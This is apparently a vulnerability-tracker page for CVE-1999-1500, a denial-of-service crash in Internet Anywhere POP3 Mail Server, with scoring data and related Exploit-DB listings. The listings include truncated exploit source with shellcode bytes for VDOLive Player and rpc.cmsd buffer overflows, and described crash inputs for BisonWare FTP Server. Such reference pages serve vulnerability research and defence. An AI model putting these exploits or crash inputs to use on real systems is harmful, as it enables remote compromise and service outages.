CVE-1999-1500
published 1999-10-01CVE-1999-1500: Internet Anywhere POP3 Mail Server 2.3.1 allows remote attackers to cause a denial of service (crash) via (1) LIST, (2) TOP, or (3) UIDL commands using letters…
PriorityP411medium5CVSS 2.0
AVNACLAuNCNINAP
EPSS
1.34%
67.9th percentile
Internet Anywhere POP3 Mail Server 2.3.1 allows remote attackers to cause a denial of service (crash) via (1) LIST, (2) TOP, or (3) UIDL commands using letters as arguments.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| true_north | internet_anywhere_mail_server | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
VDOLive Player 3.0.2 - Local Buffer Overflow
exploitdb·1999-12-13
CVE-1999-1007 VDOLive Player 3.0.2 - Local Buffer Overflow
VDOLive Player 3.0.2 - Local Buffer Overflow
---
// source: https://www.securityfocus.com/bid/872/info
VDOLive Player v3.02 has an unchecked buffer that can allow arbitrary code to be executed if a specially-crafted .vdo file is loaded.
/*====================================================================
ex_vdolive.c / VDO Live Player 3.02 32bit exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN ([email protected])
*/
#include
#include
#include
#define RETADR 90
#define CODE1_OFS 102
#define CODE2_OFS 10
#define MAXBUF1 180
#define MAXBUF2 1500
#define JMPESP_1 0xff
#define JMPESP_2 0xe4
#define NOP 0x90
#define KERNEL_NAME "kernel32.dll"
unsigned char exploit_jmping[100]={
0x33,0xDB,0x8B,0x41,0x30,0xB3,0xBB,0x03,
0xC3,0xFF,0xE0
Exploit-DB
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)
exploitdb·1999-07-13
CVE-1999-0696 Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)
Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/524/info
There is a remotely exploitable buffer overflow vulnerability in rpc.cmsd which ships with Sun's Solaris and HP-UX versions 10.20, 10.30 and 11.0 operating systems. The consequence is a remote root compromise.
/*## copyright LAST STAGE OF DELIRIUM jul 1999 poland *://lsd-pl.net/ #*/
/*## rpc.cmsd #*/
#include
#include
#include
#include
#include
#include
#include
#define ADRNUM 1500
#define NOPNUM 1600
#define CMSD_PROG 100068
#define CMSD_VERS 4
#define CMSD_PING 0
#define CMSD_CREATE 21
#define CMSD_INSERT 6
char findsckcode[]=
"\x20\xbf\xff\xff" /* bn,a */
"\x20\xbf\xff\xff" /* bn,a */
"\x7f\xff\xff\xff" /* call
Exploit-DB
BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities
exploitdb·1999-05-17
CVE-1999-1510 BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities
BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities
---
// source: https://www.securityfocus.com/bid/271/info
Multiple vulnerabilities in the BisonWare FTP Server can cause denials of service.
The vulnerabilities are:
The server fails to close the socket created by a PASV command in multiple PASV commands are executed back to back. This can create a socket and memory shortage that will not be fixed when the client disconnects from the server.
Connecting to the server and issuing a "PORT a" command followed by several thousand carriege returns and new lines will cause the server to crash.
The are multiple buffer overflows in all commands that take arguments. For example LIST and CWD both crash the server if they are passed string longer than 1500 characters.
The USER command in
No writeups or analysis indexed.
1999-10-01
Published